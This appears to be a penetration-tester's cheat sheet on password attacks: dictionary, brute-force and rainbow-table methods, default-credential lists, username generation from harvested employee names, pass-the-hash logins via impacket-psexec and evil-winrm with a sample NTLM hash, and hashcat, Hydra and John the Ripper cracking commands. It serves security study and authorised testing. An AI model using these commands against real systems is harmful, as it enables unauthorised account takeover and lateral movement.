Authentication is validating your identity through a validation mechanism using a combination of three main factors:

1. Something you know. (a password, passcode, pin, etc.)
2. Something you have. (an ID card, security key, or other MFA tools.)
3. Something you are. (your physical self, username, email address, or other identifiers.)

Operating System

• Linux
• Windows

Password Attack Methods

• Dictionary Attacks
  • Using pre-generated word lists to guess passwords. Effective because many people use common words. Defend by using unique, complex passwords and two-factor authentication.
• Brute Force
  • Trying every possible character combination. Very slow but thorough. Longer passwords (8+ characters) with mixed character types significantly increase cracking time.
• Rainbow Table Attacks
  • Using pre-computed hash-to-password conversion tables. Faster than brute force but limited to passwords already in the table.

Default Credentials

Many applications, or almost all of them, often come with default credentials after installation. Default credentials can also be found in the product documentation.

More of it default-password topic.

• DefaultCreds-cheat-sheet
• many-passwords
• Default router username and password

Generate Usernames

Gather employee names from social media and company websites, then convert to likely usernames based on common organizational naming conventions.

Here are some common username conventions:

Tip

Username structure typically matches email format (username@domain). Example: [email protected] indicates “jdoe” is the username.

# Generate username - username-anarchy (https://github.com/urbanadventurer/username-anarchy)
username-anarchy -i ~/names.txt

Pass-the-Hash

NTLM authentication protocol vulnerability allowing authentication using just the password hash instead of plaintext credentials. Can bypass the need for password cracking by directly using harvested hashes for lateral movement.

# Login with AUTHENTICATION (prompt password)
impacket-psexec Administrator@$IP
 
# Pass-the-Hash
impacket-psexec Administrator@$IP -hashes <hash:hash>
impacket-psexec example.local/Administrator@$IP -hashes <hash:hash>

Link to original

evil-winrm -i $IP -u Administrator -p password123       # Login
evil-winrm -S -c pub.key -k decrypted_priv.key -i $IP   # Login (CERTIFICATES/SSL)
 
# Pass-the-Hash
evil-winrm -i $IP  -u  Administrator -H "64f12cddaa88057e06a81b54e73b949b" 

Link to original

Hashcat

Hashcat is the world’s fastest and most advanced password recovery tool. It’s compatible with CPUs, GPUs, and other hardware accelerators across different operating systems.

Hashcat: example_hashes wiki

Rule File

Hashcat can generate password variations using mutation rules, employing a specialized syntax for defining characters, words, and their possible modifications.
The comprehensive list of this syntax is available in Hashcat’s official documentation.

Here’s an example of syntax.

Function	Description
:	Do nothing.
l	Lowercase all letters.
u	Uppercase all letters.
c	Capitalize the first letter and lowercase others.
sXY	Replace all instances of X with Y.
$X	Append character X to end.

Here’s an example of rules.

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

# Generating rule-based wordlist
hashcat --force passwords.txt -r custom.rule --stdout > mut_password.list
 
# List all the rules
ls /usr/share/hashcat/rules/

Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

• Port 21 - File Transfer Protocol (FTP)
• Port 22 - Secure Shell Protocol (SSH)
• Port 139,445 - Server Message Block (SMB)
• Port 3306 - MySQL
• Port 3389 - RDP

John the Ripper

John the Ripper is a fast password cracker primarily designed to detect weak Unix passwords. The “Jumbo” version expands this capability with support for hundreds of additional hash types and ciphers.

Cracking Files

John is also capable of cracking password-protected files. It has additional tools that process the files into hashes that John can work with.

# Turns file into hashes
pdf2john file.pdf > file.hash
 
# Crack using John
john file.hash
# OR
john --wordlist=/wordlists/passwords.txt file.hash

Here’s a list that includes for files cracking but not all.

Tool	Description
pdf2john	Converts PDF documents for John
ssh2john	Converts SSH private keys for John
mscash2john	Converts MS Cash hashes for John
keychain2john	Converts OS X keychain files for John
rar2john	Converts RAR archives for John
pfx2john	Converts PKCS#12 files for John
truecrypt_volume2john	Converts TrueCrypt volumes for John
keepass2john	Converts KeePass databases for John
vncpcap2john	Converts VNC PCAP files for John
putty2john	Converts PuTTY private keys for John
zip2john	Converts ZIP archives for John
hccap2john	Converts WPA/WPA2 handshake captures for John
office2john	Converts MS Office documents for John
wpa2john	Converts WPA/WPA2 handshakes for John

# List all the tools
locate *2john*
 
# 2John Full list of tools
https://medium.com/@1200km/2john-9bb0bd44ed64